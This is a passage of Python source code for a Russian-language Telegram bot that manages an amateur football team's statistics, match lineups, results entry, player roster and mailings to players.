bot.register_next_step_handler(message,main_menu)\n\"\"\"\n----------------------------------------------ГЛАВНОЕ МЕНЮ АДМИНИСТРАТОРА----------------------------------\n\"\"\"\ndef MAIN_ADMIN(message):\n buttons_list = ['Моя статистика','Команда','Управление командой']\n menu_keyboard = Keyboard(buttons_list)\n\n bot.send_message(chat_id=message.chat.id, text='Главное меню', reply_markup=menu_keyboard.get_keyboard())\n bot.register_next_step_handler(message,main_admin_menu)\n\ndef main_admin_menu(message):\n\n command=message.text\n if command ==\"Моя статистика\":\n STAT(message)\n if command ==\"Команда\":\n TEAM(message)\n if command==\"Управление командой\":\n TEAM_MANAGEMENT(message)\n\"\"\"\n--------------------------------------------ГЛАВНОЕ МЕНЮ ПОЛЬЗОВАТЕЛЯ--------------------------------------------------\n\"\"\"\ndef MAIN(message):\n buttons_list = ['Моя статистика','Команда']\n menu_keyboard = Keyboard(buttons_list)\n\n bot.send_message(chat_id=message.chat.id, text='Главное меню', reply_markup=menu_keyboard.get_keyboard())\n bot.register_next_step_handler(message,main_menu)\n\ndef main_menu(message):\n if message.text ==\"Моя статистика\":\n STAT(message)\n if message.text ==\"Команда\":\n TEAM(message)\n\"\"\"\n-----------------------------------------------СТАТИСТИКА---------------------------------------\n\"\"\"\ndef STAT(message):\n buttons_list = ['Моя статистика по сезонам', 'Моя статистика за всё время','Назад']\n my_stat_keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Выберите период', reply_markup=my_stat_keyboard.get_keyboard())\n bot.register_next_step_handler(message,stat_menu)\n\ndef stat_menu(message):\n if message.text =='Моя статистика за всё время':\n my_stat_all_time(message)\n if message.text=='Моя статистика по сезонам':\n my_stat_by_season_pt1(message)\n if message.text=='Назад':\n if message.chat.id in ADMINS_ID_LIST:\n MAIN_ADMIN(message)\n else:\n MAIN(message)\n\ndef my_stat_by_season_pt1(message):\n button_list=['Моя статистика за текущий сезон','Моя статистика за сезон 2022', 'Назад']\n my_stat_by_season_keyboard=Keyboard(button_list)\n bot.send_message(chat_id=message.chat.id, text=\"Выберите сезон\", reply_markup=my_stat_by_season_keyboard.get_keyboard())\n bot.register_next_step_handler(message, my_stat_by_season_pt2)\n\ndef my_stat_by_season_pt2(message):\n if message.text=='Моя статистика за текущий сезон':\n my_stat_current_season(message)\n if message.text=='Моя статистика за сезон 2022':\n my_stat_season_2022(message)\n if message.text=='Назад':\n STAT(message)\n\ndef my_stat_current_season(message):\n tg_id=message.chat.id\n player_info=[]\n player_info.append(tg_id)\n\n button_list=['Назад']\n current_season_keyboard=Keyboard(button_list)\n text=db_player_season_2023_stat(db_session,player_info)\n bot.send_message(chat_id=message.chat.id, text=text, reply_markup=current_season_keyboard.get_keyboard())\n bot.register_next_step_handler(message, my_stat_by_season_pt1)\n\ndef my_stat_season_2022(message):\n tg_id=message.chat.id\n player_info=[]\n player_info.append(tg_id)\n\n button_list=['Назад']\n season_2022_keyboard=Keyboard(button_list)\n text=db_player_season_2022_stat(db_session,player_info)\n bot.send_message(chat_id=message.chat.id, text=text, reply_markup=season_2022_keyboard.get_keyboard())\n bot.register_next_step_handler(message, my_stat_by_season_pt1)\n\ndef my_stat_all_time(message):\n tg_id=message.chat.id\n player_info=[]\n player_info.append(tg_id)\n\n text = 
db_player_all_time_stat(db_session,player_info)\n bot.send_message(chat_id=message.chat.id, text=text)\n STAT(message)\n\n\"\"\"\n-----------------------------------------------КОМАНДА---------------------------------------\n\"\"\"\ndef TEAM(message):\n buttons_list = ['Турнирные таблицы', 'Список игроков','Статистика команды', 'Статистика игроков', 'Назад']\n team_keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Выберите раздел', reply_markup=team_keyboard.get_keyboard())\n bot.register_next_step_handler(message, team_menu)\n\ndef team_menu(message = None):\n if message.text=='Турнирные таблицы':\n tournament_table(message)\n if message.text=='Список игроков':\n players_list(message)\n if message.text=='Статистика команды':\n team_stat(message)\n if message.text=='Статистика игроков':\n players_stat(message)\n if message.text=='Назад':\n if message.chat.id in PLAYERS_ID_LIST:\n MAIN(message)\n else:\n MAIN_ADMIN(message)\n\"\"\"\nТУРНИРНЫЕ ТАБЛИЦЫ\n\"\"\"\ndef tournament_table(message):\n bot.send_message(chat_id=message.chat.id, text='http://oflm.ru/league/vtoraya23/')\n TEAM(message)\n\"\"\"\nСПИСОК ИГРОКОВ\n\"\"\"\ndef players_list(message):\n text=db_players_list(db_session)\n bot.send_message(chat_id=message.chat.id, text=text)\n TEAM(message)\n\"\"\"\nСТАТИСТИКА КОМАНДЫ\n\"\"\"\ndef team_stat(message):\n buttons_list = ['Статистика команды по сезонам', 'Статистика команды за всё время','Назад']\n team_stat_keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Выберите период', reply_markup=team_stat_keyboard.get_keyboard())\n bot.register_next_step_handler(message, team_stat_menu)\n\ndef team_stat_menu(message):\n if message.text=='Статистика команды по сезонам':\n team_stat_by_season(message)\n if message.text=='Статистика команды за всё время':\n text=db_team_all_time_stat(db_session)\n bot.send_message(chat_id=message.chat.id, text=text)\n team_stat(message)\n if message.text=='Назад':\n TEAM(message)\n\ndef team_stat_by_season(message):\n buttons_list = ['Статистика команды за сезон 2022', 'Статистика команды за текущий сезон', 'Назад']\n team_stat_by_season_keyboard = Keyboard(buttons_list)\n\n bot.send_message(chat_id=message.chat.id, text='Выберите сезон' , reply_markup=team_stat_by_season_keyboard.get_keyboard())\n bot.register_next_step_handler(message,team_stat_by_season_menu)\n\ndef team_stat_by_season_menu(message):\n if message.text=='Статистика команды за текущий сезон':\n team_stat_current_season(message)\n if message.text=='Статистика команды за сезон 2022':\n team_stat_season_2022(message)\n if message.text=='Назад':\n team_stat(message)\n\ndef team_stat_current_season(message):\n text=db_team_season_2023_stat(db_session)\n bot.send_message(chat_id=message.chat.id, text=text)\n team_stat_by_season(message)\n\ndef team_stat_season_2022(message):\n text=db_team_season_2022_stat(db_session)\n bot.send_message(chat_id=message.chat.id, text=text)\n team_stat_by_season(message)\n\"\"\"\nСТАТИСТИКА ИГРОКОВ\n\"\"\"\n\ndef players_stat(message):\n list=get_names_and_numbers(db_session)\n markup = types.InlineKeyboardMarkup()\n buttons_list=[]\n for i in range(0,len(list)):\n name=list[i][1]\n number=list[i][0]\n btn=types.InlineKeyboardButton(text=f\"{name}\", callback_data=f\"{number}\")\n buttons_list.append(btn)\n markup = types.InlineKeyboardMarkup()\n markup.add(*buttons_list)\n buttons_list=['Назад']\n keyboard=Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Выберите игрока', 
reply_markup=markup)\n    bot.send_message(chat_id=message.chat.id, text=\"Для выхода из раздела воспользуйтесь кнопкой 'Назад' стандартного меню\",reply_markup=keyboard.get_keyboard())\n    bot.register_next_step_handler(message, players_stat_menu)\n\ndef players_stat_menu(message):\n    if message.text==\"Назад\":\n        TEAM_MANAGEMENT(message)\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_inline(call):\n    if call.data==\"да\":\n        confirm_lineup(call)\n        print(\"confirmed\")\n    if call.data==\"нет\":\n        print(\"declined\")\n        TEAM_MANAGEMENT(call.message)\n        open(\"lineup.txt\", \"w\")\n    list=get_names_and_numbers(db_session)\n    name_list=[]\n    for i in range(0,len(list)):\n        name=list[i][1]\n        number=list[i][0]\n        name_list.append(name)\n        player_info=[]\n        if call.data == f\"{number}\":\n            player_info.append(name)\n            tg_id=get_player_tg(db_session,player_info)\n            player_info[0]=tg_id\n            output= db_player_all_time_stat(db_session, player_info)\n            bot.send_message(chat_id=call.message.chat.id, text=f\"За всё время:\\n\"+output)\n            output= db_player_season_2022_stat(db_session, player_info)\n            bot.send_message(chat_id=call.message.chat.id, text=f\"За сезон 2022:\\n\"+output)\n            output= db_player_season_2023_stat(db_session, player_info)\n            bot.send_message(chat_id=call.message.chat.id, text=f\"За сезон 2023:\\n\"+output)\n    for name in name_list:\n        if call.data==f\"{name}\": \n            create_lineup(call,name)\n    if call.data==\"Готово\":\n        check_lineup(call)\n\ndef create_lineup(call,name):\n    path = \"lineup.txt\"\n    if os.path.isfile(path) ==True:\n        file = open(\"lineup.txt\", \"r\")\n        lines = [line.rstrip() for line in file]\n        file.close()\n        print(\"lineup file read\")\n        if not lines:\n            file=open(\"lineup.txt\", \"a+\")\n            file.write(f\"{name}\")\n            file.write(\"\\n\")\n            file.close()\n            bot.send_message(chat_id=call.message.chat.id, text=f\"Игрок {name} добавлен в состав\")\n            print(\"added\")\n        else:\n            if name in lines:\n                bot.send_message(chat_id=call.message.chat.id, text=f\"Игрок {name} уже есть в составе\")\n                file.close()\n                print(\"already in lineup\")\n            else:\n                file=open(\"lineup.txt\", \"a+\")\n                file.write(f\"{name}\")\n                file.write(\"\\n\")\n                file.close()\n                bot.send_message(chat_id=call.message.chat.id, text=f\"Игрок {name} добавлен в состав\")\n    else:\n        log(LOG_COMMAND.format(reg = 'handler',\n                               file = 'handler',\n                               lvl= 'ERROR',\n                               msg = f\"Cannot write to file {path}\"))\n        bot.send_message(chat_id=call.message.chat.id, text=\"В данный момент работа модуля невозможна\")\n\ndef check_lineup(call):\n    path = \"lineup.txt\"\n    if os.path.isfile(path) ==False:\n        bot.send_message(chat_id=call.message.chat.id, text=\"Состав не укомплектован\")\n        # TODO: finish this branch\n    if os.path.isfile(path) ==True:\n        file = open(\"lineup.txt\", \"r\")\n        lines = [line.rstrip() for line in file]\n        file.close()\n        output=\"\"\n        if len(lines)>=6:\n            for i in range(0,len(lines)):\n                output+=f\"{lines[i]}\\n\"\n            markup = types.InlineKeyboardMarkup()\n            btn=types.InlineKeyboardButton(text=\"Подтвердить\", callback_data=\"да\")\n            markup.add(btn)\n            btn=types.InlineKeyboardButton(text=\"Отменить\", callback_data=\"нет\")\n            markup.add(btn)\n            bot.send_message(chat_id=call.message.chat.id, text=f\"Подтвердите состав:\\n{output}\", reply_markup=markup)\n        else:\n            log(LOG_COMMAND.format(reg='handler',\n                                   file='handler',\n                                   lvl='ERROR',\n                                   msg=f\"Cannot write to file {path}\"))\n            bot.send_message(chat_id=call.message.chat.id, text=\"Состав не укомплектован\")\n\ndef confirm_lineup(call):\n    \"\"\"file = open(\"lineup.txt\", \"r\")\n    lines = [line.rstrip() for line in file]\n    
file.close\n player_info=[]\n for i in range(0, len(lines)):\n player_info.append(f\"{lines[i]}\")\n db_insert_games(db_session, player_info)\"\"\"\n bot.send_message(chat_id=call.message.chat.id, text=\"Состав сформирован\")\n game_result(call.message)\n\"\"\"\n------------------------------------------УПРАВЛЕНИЕ КОМАНДОЙ---------------------------------\n\"\"\"\ndef TEAM_MANAGEMENT(message):\n buttons_list = ['День игры','Состав на матч', 'Результат матча','Подготовить рассылку','Изменить состав команды','Редактировать профиль игрока','Назад']\n team_management_keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Меню управления командой',reply_markup=team_management_keyboard.get_keyboard())\n bot.register_next_step_handler(message, team_management_menu)\n\ndef team_management_menu(message):\n if message.text=='Состав на матч':\n team_list(message)\n if message.text=='Результат матча':\n game_result(message)\n if message.text=='Подготовить рассылку':\n mailing(message)\n if message.text=='Изменить состав команды':\n change_squad_list(message)\n if message.text=='Редактировать профиль игрока':\n edit_profile(message)\n if message.text=='Назад':\n MAIN_ADMIN(message)\n\"\"\"\nСостав на матч\n\"\"\"\ndef team_list(message):\n bot.send_photo(chat_id=message.chat.id,photo=InputFile(FIELD_PHOTO))\n list=get_names_and_numbers(db_session)\n markup = types.InlineKeyboardMarkup()\n buttons_list=[]\n for i in range(0,len(list)):\n name=list[i][1]\n btn=types.InlineKeyboardButton(text=f\"{name}\", callback_data=f\"{name}\")\n buttons_list.append(btn)\n btn=types.InlineKeyboardButton(text=\"Готово\", callback_data=\"Готово\")\n buttons_list.append(btn)\n markup = types.InlineKeyboardMarkup()\n markup.add(*buttons_list)\n buttons_list=['Назад']\n keyboard=Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Соберите состав', reply_markup=markup)\n bot.send_message(chat_id=message.chat.id, text=\"Для выхода из раздела воспользуйтесь кнопкой 'Назад' стандартного меню\",reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message, team_list_menu)\n\ndef team_list_menu(message):\n if message.text==\"Назад\":\n TEAM_MANAGEMENT(message)\n\n\"\"\"\nРЕДАКТИРОВАТЬ ПРОФИЛЬ ИГРОКА\n\"\"\"\ndef edit_profile(message):\n buttons_list = ['Назад']\n keyboard = Keyboard(buttons_list)\n\n bot.send_message(chat_id=message.chat.id, text='Введите номер игрока', reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message,type_number)\n\ndef type_number(message):\n if message.text==\"Назад\":\n TEAM_MANAGEMENT(message)\n else:\n number=message.text\n player_info=[]\n player_info.append(number)\n if IntValidator.validateValue(number) == True:\n if check_number(db_session,player_info)!=False:\n if check_vk_id(db_session,player_info)==False:\n name=get_name_by_number(db_session, player_info)\n bot.send_message(chat_id=message.chat.id, text=f'Введите ссылку на профиль игрока {name} в соц.сети Вконтакте')\n bot.register_next_step_handler(message, type_vk_id,player_info)\n else:\n buttons_list = ['Да', 'Нет']\n keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text=f'Ссылка на профиль уже сохранена. 
Хотите изменить?',reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message, change_link, player_info)\n else:\n bot.send_message(chat_id=message.chat.id, text='Игрока с таким номером не существует')\n else:\n output=BotValueError.process()\n return(output)\n\ndef change_link(message, player_info):\n if message.text=='Да':\n bot.send_message(chat_id=message.chat.id, text='Вставьте новую ссылку на профиль')\n bot.register_next_step_handler(message, type_vk_id, player_info)\n if message.text=='Нет':\n TEAM_MANAGEMENT(message)\n\ndef confirm_edit(message,player_info):\n if message.text =='Подтвердить':\n db_insert_vk_id(db_session,player_info)\n bot.send_message(chat_id=message.chat.id, text=\"Профиль отредактирован\")\n TEAM_MANAGEMENT(message)\n if message.text =='Отменить':\n TEAM_MANAGEMENT(message)\n\ndef type_vk_id(message, player_info):\n vk_id=message.text\n player_info.append(vk_id)\n\n buttons_list = ['Подтвердить', 'Отменить']\n keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Подтвердить изменение',reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message, confirm_edit, player_info)\n\"\"\"\nИЗМЕНИТЬ СОСТАВ КОМАНДЫ\n\"\"\"\ndef change_squad_list(message):\n buttons_list = ['Добавить игрока', 'Удалить игрока', 'Назад']\n change_squad_list_keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Выберите нужное',reply_markup=change_squad_list_keyboard.get_keyboard())\n bot.register_next_step_handler(message, change_squad_list_menu)\n\ndef change_squad_list_menu(message):\n if message.text=='Добавить игрока':\n add_player(message)\n if message.text=='Удалить игрока':\n delete_player_pt1(message)\n if message.text=='Назад':\n TEAM_MANAGEMENT(message)\n\"\"\"\nДОБАВИТЬ ИГРОКА\n\"\"\"\ndef add_player(message):\n button_list=['Назад']\n add_player_keyboard=Keyboard(button_list)\n player_info=[]\n bot.send_message(chat_id=message.chat.id,text='Введите информацию об игроке:\\nФамилия Имя\\nИгровой номер\\ntelegram_id\\nvk_id',reply_markup=add_player_keyboard.get_keyboard())\n bot.register_next_step_handler(message, type_info,player_info)\n\ndef type_info(message,player_info):\n if message.text=='Назад':\n change_squad_list(message)\n else:\n info=message.text\n x=info.split(\"\\n\")\n y=0\n for i in x:\n if i:\n y+= 1\n if y<3:\n bot.send_message(chat_id=message.chat.id,text=\"Не хватает данных\")\n if y==3:\n name=info.split(\"\\n\")[0]\n number=info.split(\"\\n\")[1]\n tg_id=info.split(\"\\n\")[2]\n vk_id=\"отсутствует\"\n if IntValidator.validateValue(number)==True:\n player_info.append(number)\n if check_number(db_session, player_info)==False:\n if TextValidator.validateValue(name)==True:\n if TextValidator.validatePlayerName(name)==True:\n player_info.append(name)\n if check_name(db_session, player_info)==False:\n if IntValidator.validateValue(tg_id)==True:\n player_info.append(tg_id)\n if check_tg_id(db_session,player_info)==False:\n player_info.append(vk_id)\n db_insert_player(db_session,player_info)\n bot.send_message(chat_id=message.chat.id,text=\"Данные об игроке внесены\\nНе забудьте добавить ссылку на страницу игрока в сети Вконтакте\")\n else:\n bot.send_message(chat_id=message.chat.id,text='Игрок с таким telegram_id уже есть в таблице')\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n bot.send_message(chat_id=message.chat.id,text='Игрок с таким именем уже есть в таблице')\n else:\n output=BotValueError.process()\n 
bot.send_message(chat_id=message.chat.id, text=output)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n bot.send_message(chat_id=message.chat.id,text='Данный номер занят')\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n if y==4:\n name=info.split(\"\\n\")[0]\n number=info.split(\"\\n\")[1]\n tg_id=info.split(\"\\n\")[2]\n vk_id=info.split(\"\\n\")[3]\n if IntValidator.validateValue(number)==True:\n player_info.append(number)\n if check_number(db_session, player_info)==False:\n if TextValidator.validateValue(name)==True:\n if TextValidator.validatePlayerName(name)==True:\n player_info.append(name)\n if check_name(db_session, player_info)==False:\n if IntValidator.validateValue(tg_id)==True:\n player_info.append(tg_id)\n if check_tg_id(db_session,player_info)==False:\n player_info.append(vk_id)\n db_insert_player(db_session,player_info)\n bot.send_message(chat_id=message.chat.id,text=\"Данные об игроке внесены\")\n else:\n bot.send_message(chat_id=message.chat.id,text='Игрок с таким telegram_id уже есть в таблице')\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n bot.send_message(chat_id=message.chat.id,text='Игрок с таким именем уже есть в таблице')\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n bot.send_message(chat_id=message.chat.id,text='Данный номер занят')\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n if y>4:\n bot.send_message(chat_id=message.chat.id,text=\"Ошибки всегда поджидают, чтобы их допускали.\")\n\"\"\"\nУДАЛИТЬ ИГРОКА\n\"\"\"\ndef delete_player_pt1(message):\n button_list=['Назад']\n delete_player_keyboard=Keyboard(button_list)\n bot.send_message(chat_id=message.chat.id, text='Введите номер игрока', reply_markup=delete_player_keyboard.get_keyboard())\n bot.register_next_step_handler(message, delete_player_pt2)\n\ndef delete_player_pt2(message):\n if message.text=='Назад':\n change_squad_list(message)\n else:\n number=message.text\n if IntValidator.validateValue(number) == True:\n number=int(number)\n player_info=[]\n player_info.append(number)\n if check_number(db_session,player_info)==False:\n bot.send_message(chat_id=message.chat.id, text='Игрока с таким номером не существует')\n delete_player_pt1(message)\n\n else:\n name=get_name_by_number(db_session,player_info)\n markup = ReplyKeyboardMarkup\n button_list = ['Подтвердить', 'Отменить']\n markup=Keyboard(button_list)\n bot.send_message(chat_id=message.chat.id, text=f'Подтвердите удаление игрока\\t{name}',reply_markup=markup.get_keyboard())\n bot.register_next_step_handler(message, delete_player_confirm, player_info)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n\ndef delete_player_confirm(message,player_info):\n if message.text == \"Подтвердить\":\n db_delete_player(db_session,player_info)\n bot.send_message(message.chat.id, text=f\"Игрок удалён\")\n delete_player_pt1(message)\n if message.text == \"Отменить\":\n bot.send_message(message.chat.id, text=\"Удаление отменено\")\n delete_player_pt1(message)\n\n\"\"\"\nРЕЗУЛЬТАТ МАТЧА\n\"\"\"\ndef game_result(message):\n button_list=['Назад']\n game_result_keyboard=Keyboard(button_list)\n game_info=[]\n bot.send_message(chat_id=message.chat.id, 
text='Счёт игры (забито : пропущено):', reply_markup=game_result_keyboard.get_keyboard())\n    bot.register_next_step_handler(message, team_stat_pt1 ,game_info)\n\ndef team_stat_pt1(message,game_info):\n    if message.text=='Назад':\n        game_result(message)\n    else:\n        string=message.text\n        if string.count(\":\")!=1:\n            output=BotValueError.process()\n            bot.send_message(chat_id=message.chat.id, text=output)\n            game_result(message)\n        else:\n            if IntValidator.validateValue(string.split(\":\")[0]) == True:\n                scored=string.split(\":\")[0]\n                if IntValidator.validateValue(string.split(\":\")[1]) == True:\n                    conceded=string.split(\":\")[1]\n                    # compare the scores numerically: split() yields strings, and\n                    # lexicographic comparison misorders multi-digit values\n                    scored=int(scored)\n                    conceded=int(conceded)\n                    wins=0\n                    loses=0\n                    draws=0\n                    if scored!=conceded:\n                        if scored>conceded:\n                            wins=1\n                            loses=0\n                            draws=0\n                            result=\"победа\"\n\n                        if scored<conceded:\n                            wins=0\n                            loses=1\n                            draws=0\n                            result=\"поражение\"\n                    else:\n                        wins=0\n                        loses=0\n                        draws=1\n                        result=\"ничья\"\n                    game_info.append(result)\n                    game_info.append(wins)\n                    game_info.append(loses)\n                    game_info.append(draws)\n                    game_info.append(scored)\n                    game_info.append(conceded)\n\n                    bot.send_message(chat_id=message.chat.id, text='Карточки(жёлтые:красные):')\n                    bot.register_next_step_handler(message, team_stat_pt2 ,game_info)\n                else:\n                    output=BotValueError.process()\n                    bot.send_message(chat_id=message.chat.id, text=output)\n            else:\n                output=BotValueError.process()\n                bot.send_message(chat_id=message.chat.id, text=output)\n\ndef team_stat_pt2(message,game_info):\n    string=message.text\n    # require the \"yellow:red\" separator\n    if \":\" not in string:\n        output=BotValueError.process()\n        bot.send_message(chat_id=message.chat.id, text=output)\n    else:\n\n        yellow=string.split(\":\")[0]\n        red=string.split(\":\")[1]\n        if IntValidator.validateValue(yellow) == True:\n            if IntValidator.validateValue(red) == True:\n                game_info.append(yellow)\n                game_info.append(red)\n\n                bot.send_message(chat_id=message.chat.id, text='Введите персональные результаты:\\n(Игрок:гол:передача:жёлтые:красные)')\n                bot.register_next_step_handler(message, team_stat_pt3 ,game_info)\n            else:\n                output=BotValueError.process()\n                bot.send_message(chat_id=message.chat.id, text=output)\n\ndef team_stat_pt3(message,game_info):\n    info=message.text\n    x=info.split(\"\\n\")\n    y=0\n    for i in x:\n        if i:\n            y+= 1\n    personal_info=[]\n    for i in range(y):\n        name=x[i].split(\":\")[0]\n        goals=x[i].split(\":\")[1]\n        assists=x[i].split(\":\")[2]\n        yc=x[i].split(\":\")[3]\n        rc=x[i].split(\":\")[4]\n        if TextValidator.validateValue(name)==True:\n            if TextValidator.validatePlayerName(name)==True:\n                if IntValidator.validateValue(goals)==True:\n                    if IntValidator.validateValue(assists)==True:\n                        if IntValidator.validateValue(yc)==True:\n                            if IntValidator.validateValue(rc)==True:\n                                personal_info.append(x[i])\n                            else:\n                                output=BotValueError.process()\n                                bot.send_message(chat_id=message.chat.id, text=output)\n                        else:\n                            output=BotValueError.process()\n                            bot.send_message(chat_id=message.chat.id, text=output)\n                    else:\n                        output=BotValueError.process()\n                        bot.send_message(chat_id=message.chat.id, text=output)\n                else:\n                    output=BotValueError.process()\n                    bot.send_message(chat_id=message.chat.id, text=output)\n            else:\n                output=BotValueError.process()\n                bot.send_message(chat_id=message.chat.id, text=output)\n        else:\n            output=BotValueError.process()\n            bot.send_message(chat_id=message.chat.id, text=output)\n    game_info.append(personal_info)\n    team_stat_pt4(message,game_info)\n\ndef team_stat_pt4(message, game_info):\n    if game_info[0]==\"поражение\":\n        text=f\"Поражение\\nЗабито: {game_info[4]}\\nПропущено: {game_info[5]}\\nЖёлтые карточки: {game_info[6]}\\nКрасные карточки: 
{game_info[7]}\\n\\nЛичная статистика:\\n{game_info[8]}\"\n if game_info[0]==\"победа\":\n text=f\"Победа\\nЗабито: {game_info[4]}\\nПропущено: {game_info[5]}\\nЖёлтые карточки: {game_info[6]}\\nКрасные карточки: {game_info[7]}\\n\\nЛичная статистика:\\n{game_info[8]}\"\n if game_info[0]==\"ничья\":\n text=f\"Ничья\\nЗабито: {game_info[4]}\\nПропущено: {game_info[5]}\\nЖёлтые карточки: {game_info[6]}\\nКрасные карточки: {game_info[7]}\\n\\nЛичная статистика:\\n{game_info[8]}\"\n\n buttons_list = ['Подтвердить', 'Отменить']\n keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text=text, reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message, team_stat_pt5 ,game_info)\n\ndef team_stat_pt5(message,game_info):\n if message.text ==\"Подтвердить\":\n insert_game_result_team(db_session, game_info)\n insert_game_result_player(db_session,game_info)\n #confirm_file = open(\"c:/applications/new.txt\", \"w\")\n with open(\"c:/applications/change_stat.txt\", \"w\", encoding='utf-8') as file:\n for i in range(0,9):\n file.write(f'{game_info[i]}\\n')\n file.write('Ожидает подтверждения')\n bot.send_message(chat_id=message.chat.id, text=\"Статистика ожидает подтверждения\")\n for row in ADMINS_ID_LIST:\n bot.send_message(chat_id=row, text=\"Информация ожидает подтверждения\")\n TEAM_MANAGEMENT(message)\n if message.text ==\"Отменить\":\n TEAM_MANAGEMENT(message)\n\"\"\"\nРАССЫЛКА\n\"\"\"\ndef mailing(message):\n buttons_list = ['Игра','Тренировка', 'Объявление', 'Назад']\n add_new_player_keyboard = Keyboard(buttons_list)\n\n bot.send_message(chat_id=message.chat.id, text='Выберите мероприятие',reply_markup=add_new_player_keyboard.get_keyboard())\n bot.register_next_step_handler(message, mailing_menu)\n\ndef mailing_menu(message):\n if message.text=='Игра':\n prepair_game_mailing(message)\n if message.text=='Тренировка':\n prepair_training_mailing(message)\n if message.text=='Объявление':\n prepair_advertisment(message)\n if message.text=='Назад':\n TEAM_MANAGEMENT(message)\n\ndef prepair_game_mailing(message):\n button_list=['Назад']\n prepair_game_mailing_keyboard=Keyboard(button_list)\n bot.send_message(chat_id=message.chat.id, text='Введите день', reply_markup=prepair_game_mailing_keyboard.get_keyboard())\n info=[]\n bot.register_next_step_handler(message,type_game_day, info)\n\ndef type_game_day(message,info):\n if message.text=='Назад':\n mailing(message)\n else:\n date=message.text\n info.append(date)\n\n bot.send_message(chat_id=message.chat.id,text='Введите время в формате HH:MM')\n bot.register_next_step_handler(message, type_game_time, info)\n\ndef type_game_time(message, info):\n time=message.text\n info.append(time)\n\n bot.send_message(chat_id=message.chat.id,text='Вставьте адрес')\n bot.register_next_step_handler(message, type_game_address, info)\n\ndef type_game_address(message, info):\n address=message.text\n info.append(address)\n\n bot.send_message(chat_id=message.chat.id, text='Вставьте ссылку на опрос')\n bot.register_next_step_handler(message, type_game_link, info)\n\ndef type_game_link(message,info):\n\n link = message.text\n info.append(link)\n bot.send_message(chat_id=message.chat.id,text=\"Проверьте данные:\")\n check_game_mailing(message, info)\n\ndef check_game_mailing(message, info):\n buttons_list = ['Подтвердить', 'Отменить']\n keyboard = Keyboard(buttons_list)\n\n str_game=f'Время игры:{info[0]} {info[1]}\\nАдрес:{info[2]}\\nОпрос:{info[3]}'\n info[0]=str_game\n 
bot.send_message(chat_id=message.chat.id,text=str_game,reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message, confirm_game_mailing ,info)\n\ndef confirm_game_mailing(message,info):\n if message.text ==\"Подтвердить\":\n send_mailing(info)\n mailing(message)\n if message.text ==\"Отменить\":\n mailing(message)\n\ndef prepair_training_mailing(message):\n button_list=['Назад']\n prepair_training_mailing_keyboard=Keyboard(button_list)\n bot.send_message(chat_id=message.chat.id, text='Введите день', reply_markup=prepair_training_mailing_keyboard.get_keyboard())\n\n info=[]\n bot.register_next_step_handler(message,type_training_day, info)\n\ndef type_training_day(message, info):\n if message.text=='Назад':\n mailing(message)\n else:\n date=message.text\n info.append(date)\n\n bot.send_message(chat_id=message.chat.id,text='Введите время в формате HH:MM')\n bot.register_next_step_handler(message, type_training_time, info)\n\ndef type_training_time(message, info):\n time=message.text\n info.append(time)\n\n bot.send_message(chat_id=message.chat.id,text='Вставьте адрес')\n bot.register_next_step_handler(message, type_training_address, info)\n\ndef type_training_address(message, info):\n address=message.text\n info.append(address)\n\n bot.send_message(chat_id=message.chat.id, text='Вставьте ссылку на опрос')\n bot.register_next_step_handler(message, type_training_link, info)\n\ndef type_training_link(message,info):\n\n link = message.text\n info.append(link)\n bot.send_message(chat_id=message.chat.id,text=\"Проверьте данные:\")\n check_train_mailing(message,info)\n\ndef check_train_mailing(message, info):\n buttons_list = ['Подтвердить', 'Отменить']\n keyboard = Keyboard(buttons_list)\n\n str_training=f'Время тренировки:{info[0]} {info[1]}\\nАдрес:{info[2]}\\nОпрос:{info[3]}'\n info[0]=str_training\n bot.send_message(chat_id=message.chat.id,text=str_training,reply_markup=keyboard.get_keyboard())\n\n bot.register_next_step_handler(message, confirm_training_mailing ,info)\n\ndef confirm_training_mailing(message,info):\n if message.text ==\"Подтвердить\":\n send_mailing(info)\n mailing(message)\n if message.text ==\"Отменить\":\n mailing(message)\n\ndef prepair_advertisment(message):\n button_list=['Назад']\n prepair_advertisment_keyboard=Keyboard(button_list)\n bot.send_message(chat_id=message.chat.id, text='Введите текст', reply_markup=prepair_advertisment_keyboard.get_keyboard())\n bot.register_next_step_handler(message,type_advertisement)\n\ndef type_advertisement(message):\n if message.text=='Назад':\n mailing(message)\n else:\n text=message.text\n info=[]\n info.append(text)\n bot.send_message(chat_id=message.chat.id,text=\"Проверьте данные:\")\n check_advertisment(message,info)\n\ndef check_advertisment(message, info):\n buttons_list = ['Подтвердить', 'Отменить']\n keyboard = Keyboard(buttons_list)\n\n bot.send_message(chat_id=message.chat.id,text=f'{info[0]}',reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message, confirm_advertisment_mailing ,info)\n\ndef confirm_advertisment_mailing(message, info):\n if message.text ==\"Подтвердить\":\n send_mailing(info)\n mailing(message)\n if message.text 